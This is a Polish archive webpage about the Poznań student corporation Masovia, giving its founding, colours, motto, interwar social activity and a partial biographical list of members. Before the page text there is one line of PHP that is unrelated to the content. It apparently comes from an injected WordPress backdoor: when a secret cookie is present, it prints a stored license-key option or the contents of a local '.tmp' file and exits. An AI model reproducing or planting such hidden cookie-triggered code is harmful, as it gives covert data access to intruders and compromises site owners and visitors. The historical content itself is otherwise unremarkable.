if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Masovia

Dekiel Łukasza Jesse Nazwa:
Korporacja Studentów Uniwersytetu Poznańskiego “Masovia”
Siedziba:
Poznań
Data powstania:
22 II 1924 r.
Barwy:
czerwona – biała – zielona (symbolika barw: barwy narodowe oraz zieleń jako symbol nadziei na powrót Warmii i Mazur na łono Ojczyzny)
Dewiza:
„Pro Patria et Masovia”

Rys historyczny

Herb Masovii, 1934 r.

Masovia została założona dnia 22 II 1924 r. Podobnie jak K! Legia powstała z Akademickiego Komitetu Obronnego, organizacji utworzonej w związku z zamieszkami w 1923 r. w Krakowie mającej na celu “obronę całości i spoistości wewnętrznej narodu przed jakiemikolwiek atakami zewnętrznymi, a nadewszystko wewnętrznymi”. Inicjatorem powołania korporacji był prezes Akademickiego Komitetu Obronnego, ówczesny prezes K! Magna-Polonia oraz Poznańskiego Koła Międzykorporacyjnego Tadeusz Pietrykowski. Szczególnym celem ideowym Masovii miała być praca nad uświadomieniem narodowym ludności polskiej na Warmii i Mazurach.

Proporczyk Masovii, lata 30-te.

Korporacja skupiała głównie studentów Uniwersytetu Poznańskiego. Kuratorami korporacji z ramienia uczelni byli: prof. Ludwik Jaxa-Bykowski, doc. Karol Górski oraz doc. Karol Stojanowski.

Od maja 1925 r. Masovii należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 20 III 1924 r.). Kandydowała pod opieką K! Magna-Polonia. W marcu 1926 r. uzyskała prawa członka rzeczywistego.

Komers Masovii, Poznań 1927 r. (?).

Dnia 10 VII 1927 r. poświęcono sztandar korporacji. W 1929 r. powstało Koło Filistrów. Mimo, że korporacja nie należała do najstarszych w Poznaniu, stopniowo od końca lat 20-tych wzrastało jej znaczenie w poznańskim środowisku korporacyjnym. W roku akademickim 1931/32 wiceprezesem Poznańskiego Koła Międzykorporacyjnego został Stefan Jakubowski, w 1936/37 sekretarzem Roman Łaniecki, a w końcu w 1937/38 prezesem Stanisław Smoleński. W latach 1937-38 sekretarzem generalnym Związku Polskich Korporacji Akademickich wybrano Romana Łanieckiego, a w 1938 r. skarbnikiem Edwarda Ciemnoczołowskiego.

V Zjazd Mazurski Masovii, Działdowo 29 VII 1929 r.

Masovia należała do silnie zaangażowanych społecznie korporacji poznańskich. Początkowo corocznie, później co dwa lata w rocznicę zwycięstwa pod Grunwaldem organizowano Zjazdy Mazurskie w jedynym należącym do Polski mazurskim mieście - Działdowie. Prowadzono akcję wysyłania książek, czasopism i książeczek do nabożeństwa dla ludności Warmii i Mazur, podejmowano działania uświadamiające społeczeństwo w zakresie konieczności ratowania polskości na tych terenach, a także udzielano pomocy materialnej studentom pochodzącym z Warmii i Mazur.

W marcu 1936 r. wraz z Baltią, Laconią i Gedanią Posnaniensis stworzyła Porozumienie Korporacji Morskich. Dzięki temu współuczestniczyła w organizowaniu “Tygodni Pomorza”, a w tych ramach “Akademii Morskich”.

Masovia zawarła dnia 14 VII 1929 r. kartel z K! Rosevia z Wolnego Miasta Gdańska.

Całkowita ustalona, choć niekompletna imienna lista członków obejmuje 187 nazwisk, w tym 12 członków honorowych.

Mazowiacy, Poznań lata 30-te.

Jak z perspektywy kilkudziesięciu lat napisali członkowie Masovii: „Korporacja była twardą szkołą życia, wymagającą dużego wkładu pracy nad samym sobą. Kształtowała charakter i osobowość, postawę moralną, dawała wyrobienie społeczne, kontrolowała i wpływała na rozwój intelektualny. Pilnując swych członków, aby wykazywali się w czasie studiów wynikami w nauce, zapewniała im również godziwy odpoczynek, chwile odprężenia i rozrywki. W okresie wiosny każdego roku organizowano wspólne wycieczki do pobliskich miejscowości jak Kórnik, Rogalin, Puszczykowo, Puszczykówko, Szeląg i In. Fotografia ślubna Józefa Roehra i Felicji Ławniczak, Gniezno 3 VIII 1937 r.Członkowie Korporacji spotykali się także w ulubionych kawiarniach, jak Fangrat, Dobski, Cafe George i in. Uczęszczano do lokali gastronomicznych (często po fidułkach), jak Strzecha, Roma, Dymek, Piwnica Ratuszowa, Adria, Moulin Rouge, ciocia Adamska na Piekarach. Nie wolno było odwiedzać lokali o złej renomie jak Rzymska, Hala Tatrzańska. Źródłem wielkiego odprężenia oraz wesołości były urządzane przez Korporację fidułki. Królowała tam młodość, śpiew, wesołość, jak również popijanie z „buta”. Ale i tam panowała dyscyplina i obowiązywało odpowiednie korporantowi zachowanie się. Takimi metodami przygotowywała Korporacja ‘Masovia’ swych członków do życia w społeczeństwie.” (Ł. Jesse, A. Wierzchosławski, Księga Pamiątkowa Korporacji Studentów Uniwersytetu Poznańskiego „Masovia” wydana z okazji 70-tej rocznicy jej założenia (1924 – 1994), Poznań 1996, s. 76).

Zjazd Masovii, Poznań 23 X 1965 r.

W okresie powojennym Masovia działała nieoficjalnie organizując z inicjatywy prezesa Koła Filistrów Feliksa Dropińskiego zjazdy i spotkania okolicznościowe.

Od końca lat 80-tych rozpoczęły się regularne spotkania oraz wydawanie przez Łukasza Jessego “Komunikatów Koła Filistrów”. Spotkanie Mazowiaków, Poznań 1991 r. W 1990 r. do korporacji przyjęto jako członka honorowego ks. abp. Mariana Przykuckiego. W 1991 r. prof. Lech Działoszyński został pierwszym oficjalnym prezesem Stowarzyszenia Filistrów Poznańskich Korporacji Akademickich. W 1996 r. ukazała się opracowana przez Łukasza Jessego i Antoniego Wierzchosławskiego Księga Pamiątkowa Korporacji Studentów Uniwersytetu Poznańskiego “Masovia” wydana z okazji 70-tej rocznicy jej założenia (1924-1994). W 2006 r. korporacja doczekała się reaktywacji (www.masovia.org).

Lista członków

Poniższa, niekompletna lista członków Masovii obejmuje ponad 180 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

  Ludwik Jaxa-Bykowski, 1936 r.

 1. Ludwik Jaxa-Bykowski, (19 stycznia 1881 w folwarku Zagwoźdź na Podolu - 28 czerwca 1948) z rodziny szlacheckiej herbu Gryf, s. Stanisława Jakuba, absolwent Gimnazjum w Stanisławowie 1899, student filozofii i pedagogiki ULw. (dyplom 1904), nauczyciel gimnazjów w Przemyślu, Samborze i Lwowie, dyrektor VIII Gimnazjum we Lwowie, od 1921 prof. zoologii AMW, prof. i kierownik Katedry Pedagogiki UP 1927-39 oraz 1945-47, działacz polityczny związany z Narodową Demokracją, z powodów politycznych usunięty z katedry decyzją ministra Janusza Jędrzejewicza, kurator Chrobrii i Masovii, Filister honorowy Masovii, odznaczony Dyplomem Zasługi i Złotej Odznaki ZPKA, w czasie okupacji współzałożyciel Narodowo-Ludowej Organizacji Wojskowej 1939, założyciel i pierwszy rektor konspiracyjnego Uniwersytetu Ziem Zachodnich z siedzibą w Warszawie 1940-43, członek Zarządu Głównego SN 1943-45, po wojnie w 1947 aresztowany przez UB i skazany na sześć lat więzienia, zmarł na zapalenie płuc, pochowany na Cmentarzu na Jeżycach

 2. Franciszek Duralski, dr praw, prezes Prokuratury Generalnej w Poznaniu, radca ministerialny w Warszawie, Filister honorowy Masovii, prezes Koła Filistrów 1930-33
 3. Tadeusz Grabowski, (29 października 1871 w Krakowie - 27 lipca 1960 w Kórniku) s. Antoniego i Aliny z Pogorzelskich, absolwent Gimnazjum św. Jacka w Krakowie 1891, student historii literatury i językoznawstwa UJ, doktorat UJ 1900, habilitacja UJ 1901, historyk i teoretyk literatury polskiej, od. 1901 doc. a od 1909 prof. nadzw. w Katedrze Historii Literatury Polskiej UJ, prof. UP 1919-39 oraz 1945-50, kierownik Katedry Historii Literatury Polskiej, dziekan Wydziału Filozoficznego UP 1922/23, członek korespondent AU/PAU 1909, członek rzeczywisty PAU 1945, Filister honorowy Masovii, odznaczony m.in. Krzyżem Kawalerskim francuskiej Legii Honorowej oraz Krzyżem Komandorskim czeskiego Orderu Lwa Białego.

  Augustyn Grajek, 1929 r.

 4. Augustyn Grajek, (23 sierpnia 1878 w Ryszewie w Wielkopolsce - 25 maja 1931 w Działdowie) s. Franciszka i Jadwigi z d. Janas, absolwent Gimnazjum w Trzemesznie, student i absolwent farmacji Uniwersytetu w Berlinie, w czasie I wojny światowej w armii niemieckiej, stacjonował w Vogezach, po wojnie pracował w aptekach w Pakości i Brodnicy, od 1922 właściciel apteki w Działdowie, działacz społeczny, wieloletni prezesem Koła Przyjaciół Harcerstwa Polskiego, członek Powiatowego Komitetu Wychowania Fizycznego i Przysposobienia Wojskowego, Towarzystwa Gimnastycznego „Sokół”, Polskiego Towarzystwa Farmaceutycznego, należał do Stronnictwa Narodowego, a od 1930 związany z BBWR, członek magistratu Działdowa 1924-31, działał na rzecz polskości Warmii, Filister honorowy Masovii, pochowany na cmentarzu w Działdowie, podczas pogrzebu, na trumnie spoczywała czapka korporacyjna

  Antoni Ludwiczak (?), 1925 r.

 5. Antoni Ludwiczak, (16 maja 1878 w Kostrzynie Wielkopolskim - 17 czerwca 1942 w Hartheim k. Linzu) absolwent Gimnazjum św. Marii Magdaleny w Poznaniu, założyciel konspiracyjnego Towarzystwa Tomasza Zana, alumn seminarium duchownego w Gnieźnie i Poznaniu, duchowny katolicki, proboszcz parafii w Chełmcach k. Inowrocławia, działacz społeczny i polityczny, wieloletni prezes Towarzystwa Czytelni Ludowych, prezes Narodowego Stronnictwa Ludowego, poseł na Sejm Ustawodawczy w latach 1919-21, przewodniczący Warmińskiego Komitetu Plebiscytowego 1920, w 1921 założyciel pierwszego w Polsce Uniwersytetu Ludowego w Dalkach k. Gniezna (obecnie dzielnica Gniezna), Filister honorowy Masovii, aresztowany przez Gestapo w listopadzie 1939, więzień obozów koncentracyjnych w Stutthofie, Sachsenhausen i Dachau, Hartheim, zamordowany w komorze gazowej

  Alfred Ohanowicz, 1927 r. (?).

 6. Alfred Ohanowicz, (31 marca 1888 we Lwowie - 21 marca 1984 w Poznaniu) z rodziny szlacheckiej polskich Ormian, dr prawa ULw. 1910, pracownik Prokuratorii Skarbu, a następnie Prokuratorii Generalnej RP we Lwowie 1910-19, współzałożyciel wydziału prawa UP 1919, prof. i kierownik Katedry Prawa Cywilnego UP, członek Trybunału Kompetencyjnego 1928-33, senator III kadencji RP 1930-35 z ramienia BBWR, Filister honorowy Masovii, wykładowca konspiracyjnego Uniwersytetu Ziem Zachodnich 1940-45, redaktor naczelny “Ruch Prawniczego Ekonomicznego i Socjologicznego” 1958-81, dziekan Wydziału Prawa i Administracji UP/UAM, autor ok. 200 prac naukowych z dziedziny prawa cywilnego, doktor honoris causa UAM 1965, pochowany na Cmentarzu Junikowskim w Poznaniu

  Tadeusz Pietrykowski, ok. 1920 r.

 7. Tadeusz Pietrykowski, (14 października 1895 w Gorzycach pow. Żnin - 1940) brat Jana i Józefa (Magna-Polonia), absolwent Gimnazjum w Nakle n. Notecią 1916, student Berlin i prawa UP 1920-24, c. 1922 Magna-Polonia, prezes 1923/24 i 1924, prezes Poznańskiego Koła Międzykorporacyjnego, prezes Akademickiego Komitetu Obronnego, inicjator powstania Legii i Masovii, Filister honorowy Masovii (jako współzałożyciel korporacji), członek zespołu red. księgi pamiątkowej “K! Magna-Polonia 1920-13.III.-1930″ (Poznań 1930), w 1939 sędzia Sądu Okręgowego w Toruniu, w 1940 zamordowany przez Rosjan (tzw. lista ukraińska)

 8. Stanisław Srokowski, (8 lipca 1872 w Węgrzycach pod Krakowem - 20 sierpnia 1950 w Warszawie) student UJ i ULw., geograf, działacz społeczny, w czasie I wojny światowej dyrektorem Gimnazjum Macierzy Polskiej w Kijowie, po odzyskaniu niepodległości w służbie dyplomatycznej RP, konsul w Odessie i Królewcu, uczestnik III powstania śląskiego, wojewoda wołyński 1923-24, założyciel i pierwszy dyrektor 1925-26 Instytutu Bałtyckiego w Toruniu, wykładowca UJ i Szkoły Nauk Politycznych w Warszawie, Filister honorowy Masovii, po II wojnie światowej prof. UW, kierownik Komisji Ustalania Nazw Miejscowości 1946-50 (instytucji zajmującej się spolszczaniem nazw miejscowości na Ziemiach Odzyskanych), pierwszy prezes Polskiego Towarzystwa Geograficznego, autor licznych prac naukowych, po jego śmierci zmieniono w 1950 nazwę wsi w północno-wschodniej Polsce z Dryfort (Drengfurt) na Srokowo, w 1980 Stanisław Srokowski został także patronem tamtejszej szkoły podstawowej
 9. Wiktor Steffen, (27 września 1903 w Sząbruku k. Olsztyna - 29 kwietnia 1997 w Poznaniu) studiował w Poznaniu i Berlinie, uczestnik plebiscytu na Mazurach 1920, pracownik naukowy UP 1928-38, Filister honorowy Masovii, uczestnik wojny obronnej 1939 odznaczony Krzyżem Walecznych, więzień niemieckich oflagów w Brunświku i Woldenbergu 1939-45, po wojnie docent UP 1945-46, od 1946 prof. UWr., organizator i kierownik Katedry Filologii Klasycznej, kierownik Katedry Hellenistyki UAM 1957-73, dziekan Wydziału Filologicznego UAM, wykładowca na uniwersytetach w Lipsku i w Londynie, autor ponad 200 publikacji, w 1984 wydał “Słownik gwar warmińskich”, dr honoris causa UWr. 1981, prezes honorowy Polskiego Towarzystwa Filologicznego
 10. Bronisław Stelmachowski, (17 maja 1883 we Wrześni - 1940 ?) s. Ksawerego i Ludwiki z Hundtów, absolwent Gimnazjum św. Marii Magdaleny, studiował prawo w Berlinie, Monachium, Wrocławiu i Getyndze, działacz Towarzystwa Tomasza Zana, w czasie Powstania Wielkopolskiego sędzia w sądzie doraźnym, cywilista, od 1924 prof. tytularny UP, sędzia SN 1920-24 i 1928-38, sędzia w polsko-niemieckim Trybunale Rozjemczym dla Górnego Śląska 1928-38, od 1929 członek Komisji Kodyfikacyjnej RP, Filister honorowy Masovii, autor publikacji naukowych dot. procedury cywilnej, prawa upadłościowego i postępowania układowego, w 1939 aresztowany przez Rosjan, prawdopodobnie zginął

  Kazimierz Stojałowski, 1926/27 r.

 11. Kazimierz Stojałowski, (1 października 1903 w Toruniu - 22 grudnia 1995 w Poznaniu) filomata pomorski w Toruniu, student i absolwent 1927/28 med. UP, dr med. UP 1928, członek Baltii, sekretarz sem. let. 1925/26, wiceprezes sem. zim. 1926/27, w 1939 w komitecie red. II cz. Rocznika Korporacyjnego, sekretarz 1931-32 oraz wiceprezes 1936-39 Koła Filistrów, w 1939 na prośbę Masovii wygłosił serię wykładów na temat polskości Prus Wschodnich, Filister honorowy Masovii, asystent w sanatorium w Kowanówku 1928-30, asystent i adiunkt w Zakładzie Patologii Anatomicznej UP 1930-39, uczestnik wojny obronnej 1939, m.in. w obronie Warszawy, w 1939 wysiedlony z Poznania do Generalnej Guberni do Gorlic, gdzie pracował w Radzie Głównej Opiekuńczej, po wojnie adiunkt w Zakładzie Medycyny Sądowej UP, a następnie prof. i kierownik Katedry i Zakładu Anatomii Patologicznej PAM w Szczecinie, dr honoris causa PAM, autor ponad 200 prac naukowych

  Karol Stojanowski, 1939 r.

 12. Karol Stojanowski, (3 maja 1895 w Kobyłowłokach - 9 czerwca 1947 we Wrocławiu) harcmistrz, naukowiec antropolog, doc dr UP, Filister honorowy Masovii (?), działacz polityczny, w czasie okupacji działacz podziemia

 13. Bolesław Weber, od 1919 właściciel i naczelny dyrektor międzynarodowej firmy spedycyjnej “C. Hartwig SA” w Poznaniu, Filister honorowy Masovii

  Alfred Wellenger, 1931 r.Alfred Wellenger, 1927 r. (?).

 14. Alfred Wellenger, (1875-1946) ojciec Edgara (Masovia), właściciel drogerii w Działdowie, członek Stronnictwa Narodowego, radny miejski, prawd. Filister honorowy Masovii

Członkowie rzeczywiści

  Kazimierz Abt, 1927 r.

 1. Kazimierz Abt, (ur. w Kościanie - 17 marca 1969 w Poznaniu) założyciel Masovii, mgr filozofii, nauczyciel fizyki

  Roman Adamski, ok. 1930 r.

 2. Roman Adamski, (18 lipca 1906 w Bachorcach pow. Inowrocław - 26 kwietnia 1994) s. Józefa i Apolonii z d. Stankiewicz, absolwent Gimnazjum Matematyczno-Przyrodniczego w Bydgoszczy 1929, student i absolwent prawa UP 1929-34, c. 1929, po studiach urzędnik Miejskiego Urzędu Opieki Społecznej w Poznaniu oraz Starostwa Powiatowego w Kartuzach, w czasie II wojny światowej więziony w obozach w ZSRR, m.in. w Turgieniewie k. Jarosławia, Gniatyniu i Pitiszkach k. Kalinina, Pitiliszkach i Ugliczu k. Jarosławia, od 1941 żołnierz II Korpusu PSZ, m.in. uczestnik bitwy pod Monte Cassino, po wojnie na emigracji w Wielkiej Brytanii, a od 1951 w Kanadzie, w 1963 wrócił do Polski, osiedlił się w Sopocie i pracował w przemyśle okrętowym

  Włodzimierz Anczykowski, lata 30-te.

 3. Włodzimierz Anczykowski, ( - 16 stycznia 1938) absolwent Gimnazjum im. A. Asnyka w Kaliszu

 4. Marian Baahr, ( - 1939) mgr, asystent Zakładu Fizyki Doświadczalnej UP, rozstrzelany przez Niemców we wrześniu 1939 na VII Forcie w Poznaniu “za przynależność do Korporacji Masovia”

  Zbigniew Banaszkiewicz, 1939 r.

 5. Zbigniew Banaszkiewicz, ( - 1939-45) c. 1938, mgr praw, zginął w obozie koncentracyjnym

  Robert Barra, 1931/32 r.

 6. Robert Alojzy Barra, (3 grudnia 1909 w Tymawie pow. Gniew - 8 grudnia 1994) z rodziny ziemiańskiej, s. Roberta i Heleny z d. Golańska, absolwent Gimnazjum w Chełmży 1929, student i absolwent prawa UP, c. 1929, prezes sem. zim. 1931/32 oraz sem. zim. 1933/34, por. rez., w wojnie obronnej 1939 dowódca kompanii, w czasie okupacji w AK, aresztowany i więziony przez Gestapo na Szucha w Warszawie, po zakończeniu wojny więziony na na Zamku Lubelskim, później sędzia, długoletni wiceprezes Trybunału Ubezpieczeń Społecznych w Warszawie, pochowany na Cmentarzu Powązkowskim w Warszawie

 7. Jan Bartkowiak, c. ok. 1930, skreślony 1931
 8. Baumgart, założyciel Masovii, po wojnie na emigracji w Wielkiej Brytanii
 9. Marian Bąkowski, (1912 - 1979)
 10. E. Bella, leśniczy w nadleśnictwie Kudypy na Warmii
 11. Antoni Bergman, sekretarz sem. zim. 1934/35, wystąpił 1936

  Alfons Bloch, 1936/37 r.

 12. Alfons Bloch, gospodarz sem. zim. 1936/37

 13. Wilhelm Bork, (ur. w Wdzydzach - 1945) założyciel Masovii, inż. leśnik, zginął tragicznie

  Wiktor Bross, 1925 r.

 14. Wiktor Bross, (9 sierpnia 1903 w Witkowie - 19 stycznia 1994 w Katowicach) s. Konstantego i Heleny z Knastów, brat Stefana (Lutyko-Venedya), brat Mariana (Baltia), chirurg, prof. UP, UJK, od 1946 prof. Uniwersytetu Wrocławskiego, pionier torakochirurgii i współtwórca kardiochirurgii polskie, członek PAN, Akademii Nauk w Nowym Jorku, Halle

 15. Marian Brzuszkiewicz, (29 lipca 1907 w Zalesiu pow. Bydgoszcz - 1987) s. Jana i Józefy z d. Lewandowska, uczeń gimnazjów w Kwidzynie i Toruniu (matura 1927), student i absolwent prawa UP 1928-33, c. 1929, prezes sem. let. 1931/32, pchor. rez., uczestnik wojny obronnej 1939, m.in. w obronie Modlina, w niewoli niemieckiej w oflagu VIIA Murnau, gdzie zorganizował koło warmińsko-mazurkie, od 1946 adwokat w Toruniu, Bydgoszczy, Nakle i Wyrzysku

 16. Bujakowski, dr med., lekarz w Wonieściu k. Kościana

  Konstanty Bulli, pierwsza poł. lat 30-tych.

 17. Konstanty Jerzy Bulli, (30 października 1906 w Chęcinach w woj. kieleckim - 22 lutego 1995 w Sulejówku) s. Konstantego i Zofii z Okólskich, student i absolwent prawa UP, wiceprezes zewn. sem. zim. 1932/33, po studiach pracownik administracji, m.in. wicestarosta i starosta, oficer rez., uczestnik wojny obronnej 1939, w konspiracji w AK, po wojnie student i absolwent (mgr teologii ewangelickiej) Chrześcijańskiej Akademii Teologicznej w Warszawie, od 1951 wykładowca w Seminarium Duchownym Kościoła Adwentystów Dnia Siódmego, wykładowca teologii w Chrześcijańskiej Akademii Teologicznej 1966-77, redaktor “Rocznika Teologicznego” oraz miesięcznika “Znaki Czasu”, odznaczony m.in. Medalem za udział w Wojnie Obronnej, Krzyżem Kawalerskim OOP, Odznaką Honorową Społecznego Komitetu Przeciwalkoholowego

  Witold Burczyński, 1927 r.

 18. Witold Burczyński, wiceprezes wewn. sem. zim. 1930/31 (od grudnia)

 19. Edward Chudziński, zastępca sekretarza 1930/31
 20. Leon Ciecierski,

  Edward Ciemnoczołowski, 1937 r.

 21. Edward Teodor Ciemnoczołowski, (1 kwietnia 1914 w Szelejewie k. Gąsawy - 5 kwietnia 1944 w Rzeszowie) s. Franciszka i Józefy z d. Łanieckiej, absolwent Gimnazjum Klasycznego w Wągrowcu 1935, student i absolwent prawa UP 1935-39, c. 1933, skarbnik sem. zim. i sem. let. 1936/37, sekretarz sem. let. 1937/38, prezes sem. zim. 1938/39, skarbnik ZPKA 1938 (XVI kadencja), członek Komisji Rewizyjnej ZPKA 1938-39 (XVII kadencja), działacz Młodzieży Wszechpolskiej, pchor. rez., uczestnik wojny obronnej 1939, wysiedlony z rodziną do Generalnej Guberni do Mielca 1939, pracownik fabryki samolotów w Mielcu, w konspiracji w AK, aresztowany przez Gestapo wraz z kilkunastoma innymi osobami w 1944 w Mielcu, skazany na karę śmierci, rozstrzelany w Wielki Piątek w więzieniu na Zamku w Rzeszowie

 22. Antoni Czarnecki, (24 lutego 1903 w Nowem w pow. Świecie - ) s. Klemensa (mistrza murarskiego) i Anny z Grzemskich, absolwent gimnazjum w Chełmnie 1922, student i absolwent prawa UP 1922-1932/33, założyciel Masovii 1924 [prawd. tożsamy z Antonim Czarneckim, który jako giermek został skreślony z Chrobrii 1930]

  Damazy Czwojdak, lata 30-te.

 23. Damazy Czwojdak, (ur. w Trzemesznie - 1942 w Warszawie) student Wyższej Szkoły Dziennikarstwa w Warszawie, prezes stowarzyszenia samopomocowego WSD (wg innej wersji zginął w Powstaniu Warszawskim)

  Maksymilian Darnowski, lata 30-te.

 24. Maksymilian Darnowski,

  Cezary Dastych, lata 30-te.

 25. Cezary Dastych, (13 sierpnia 1904 w Fürstenwalde k. Frankfurtu nad Odrą - 5 lutego 1978 w Poznaniu) s. Marcina i Władysławy z d. Grzegorzewska, absolwent WSH 1932, ppor. rez., w wojnie obronnej 1939 dowódca plutonu 57 Pułku Piechoty, więzień niemieckiego oflagu w Murnau 1939-45, po wojnie pracownik Izby Skarbowej w Cieszynie, a następnie Wojewódzkiego Przedsiębiorstwa Hurtu Spożywczego w Poznaniu, pochowany na cmentarzu Górczyńskim w Poznaniu

  Feliks Dropiński, koniec lat 30-tychFeliks Dropiński, ok. 1925 r. (?)

 26. Feliks Henryk Dropiński, (13 maja 1897 w Poznaniu - 17 lipca 1971 w Poznaniu) s. Symforiana i Aurelii z Balczyńskich, absolwent Gimnazjum św. Marii Magdaleny, student Wydziału Matematyczno-Przyrodniczego Uniwersytetu w Berlinie 1916-17, w armii niemieckiej 1917-18, Powstaniec Wielkopolski i żołnierz wojny polsko-rosyjskiej 1920, student i absolwent prawa UP 1919?-24, założyciel Masovii, prezes sem. let. 1923/24 i sem. zim. 1924/25, wiceprezes sem. zim. 1925/26, olderman sem. zim. 1926/27 i sem. zim. 1927/28, po studiach m.in. kierownik referatu administracyjnego i karno-administracyjnego Starostwa Grodzkiego w Poznaniu 1932-34, starosta powiatowy w Szubinie 1934-35, naczelnik Wydziału Administracji Ogólnej Miasta Poznania 1936?-39, prezes Towarzystwa Miłośników Miasta Poznania, prezes Koła Filistrów Masovii, por. rez. wojsk łączności, w wojnie obronnej 1939 dowódca drugiego plutonu 14 Kompanii Telegrafistów Armii Poznań, w niewoli niemieckiej w oflagach Prenzlau, Arnswalde, Gross Born, Woldenberg, po wojnie pracownik administracji miejskiej 1945-50, szykanowany przez władze komunistyczne, od 1950 kierownik planowania transportu w przedsiębiorstwie budowlanym, pochowany na Cmentarzu Junikowskim w Poznaniu (kwatera 11), odznaczony m.in. Krzyżem Powstania Wielkopolskiego, Medalem za Wojnę 1920 r., Krzyżem Kawalerskim OOP, wg relacji dowódcy 14 Kompanii Telegraficznej por. Henryka Knie podany przez gen. Knoll-Kownackiego do odznaczenia Krzyżem Virtuti Militarii (wskutek zbyt wczesnego zakończenia działań wojennych odznaczenie nie dotarło)

 27. Brunon Dudziński, (15 listopada 1909 w Tczewie - 1988) absolwent Gimnazjum w Tczewie 1929, student prawa UP, c. ok. 1930 Masovia, skreślony 1931, student Wydziału Architektury PG 1934-3?, członek Wisły, po studiach pracował przy budowie lotniska w Krośnie Małopolskim oraz umocnień na Helu, w wojnie obronnej 1939 ranny w bitwie nad Bzurą, w niewoli niemieckiej m.in. w oflagu VIIA w Murnau, w 1944 przez pół roku w więziony przez gdańskie Gestapo, po wojnie pracował na PG i prowadził odbudową gdańskiej starówki, autor projektu przebudowy gdańskiej Opery i Filharmonii
 28. Franciszek Dylewski, (26 czerwca 1905 w Lidzbarku na Pomorzu - ) absolwent Gimnazjum w Chełmnie 1924, student med., prawa i teologii UW, UP, UJ, członek Pomeranii, akt. 1926, c. 1928 Masovia, skreślony 1928, następnie student filozofii UJ, c. 1930/31 Capitolia, akt. 1930/31

  Lech Działoszyński, 2008 r.

 29. Lech Mieczysław Działoszyński, (21 grudnia 1912 w Poznaniu - 3 marca 2014 w Poznaniu) s. Juliana (powstańca wielkopolskiego i działacza plebiscytowego na Mazurach) i Weroniki z d. Maisel, absolwent Gimnazjum Jana Kantego, student chemii UP 1935-39, c. 1937, ppor. rez., przydzielony do 55 Poznańskiego Pułku Piechoty, w wojnie obronnej 1939, m.in. walczył w obronie Modlina, w PSZ we Francji i Wielkiej Brytanii 1940-42, asystent i starszy asystent w Zakładzie Chemii Lekarskiej i Biochemii Polskiego Wydziału Lekarskiego przy Uniwersytecie w Edynburgu 1942-47, dr biochemii Uniwersytetu w Edynburgu 1944, habilitacja 1952, od 1959 prof. nadzw., organizator i kierownik Katedry Biochemii i Fizjologii Zwierząt AR w Poznaniu 1953-70, prof., organizator i kierownik Zakładu Biochemii Analitycznej Instytutu Pediatrii AM w Poznaniu 1972-83, organizator i kierownik Katedry Biochemii UMK 1955-67, pierwszy prezes 1991-94, wiceprezes 1994-97, członek Zarządu 1997-2007 Stowarzyszenia Filistrów Poznańskich Korporacji Akademickich, honorowy członek Stowarzyszenia Filistrów (Poznańskich) Korporacji Akademickich, Filister honorowy Magna-Polonii 2004, reaktywator Masovii 2006, pochowany na Cmentarzu w Przeźmierowie

 30. Franciszek Eichler, c. ok. 1931, skreślony 1932
 31. Wacław Felman, c. ok. 1931, skreślony 1931
 32. Antoni Figas, (11 czerwca 1913 w Trzemesznie -26 listopada 1976 w Trzemesznie) s. Michała i Salomei z d. Woźniak, brat Jana (Masovia), student i absolwent prawa UP, pochowany w Trzemesznie

  Jan Figas, lata 30-te.

 33. Jan Figas, (6 czerwca 1909 w Trzemesznie - 17 kwietnia 1990) s. Michała i Salomei z d. Woźniak, brat Antoniego (Masovia), absolwent Gimnazjum w Trzemesznie 1929, student i absolwent 1936 chemii UP, c. ok. 1931, uczestnik wojny obronnej 1939, po wojnie długoletni pracownik Zakładów Kosmetycznych “Lechia” w Poznaniu, a następnie w Zakładach Kosmetycznych w Katowicach

  Jan Fijałowski, ok. 1930 r.

 34. Jan Fijałowski,

  Piotr Filipowicz, ok. 1930 r.

 35. Piotr Filipowicz, z Gniezna, sekretarz sem. let. 1931/32

  Alfons Froehlke, 1931 r.

 36. Alfons Froehlke, (11 lutego 1901 w Czyczkowch pow. Brusy - 10 kwietnia 1990 w Mosinie) s. Jana i Marii Żychlińskiej, absolwent klasycznego Gimnazjum w Chojnicach 1920, założyciel Masovii, student i absolwent leśnictwa UP 1920-24, po studiach pracował w lasach na Pomorzu, a następnie w Dyrekcji Lasów Państwowych w Poznaniu, nadleśniczy w Rychtalu k. Kępna 1933-39, w Miradzu pow. Mogilno 1939 oraz 1945-50, we wrześniu 1939 aresztowany przez Niemców i wysiedlony z rodziną do Tomaszowa Mazowieckiego, gdzie został urzędnikiem Inspekcji Leśnej, pracownik Okręgowego Zarządu Lasów Państwowych w Poznaniu 1950-66, m.in. jako naczelnik Wydziału Użytkowania Lasów, odznaczony m.in. Srebrnym Krzyżem Zasługi 1939 oraz Krzyżem Kawalerskim OOP

  Rajmund Galon, 1927 r.

 37. Rajmund Galon, (14 sierpnia 1906 w Rynku pow. Lubawa - 19 czerwca 1986 w Toruniu) absolwent Gimnazjum w Toruniu 1925, student i absolwent geografii UP 1925-29, dr filozofii, wykładowca geografii fizycznej na Wydziale Matematyczno-Przyrodniczym UP 1929-39, habilitacja 1934, oficer rez., w wojnie obronnej 1939 ordynans dowódcy 17 Dywizji Piechoty, jeniec oflagu, prof. i kierownik katedry (później zakładu) geografii fizycznej UMK 1946-76, prorektor UMK, sekretarz generalny międzynarodowego stowarzyszenia geografów l’INQUA, członek rzeczywisty PAN, dr honoris causa UAM 1983 i UMK 1983

 38. Franciszek Gałka, prawnik, po wojnie pracownik banku w Gdyni
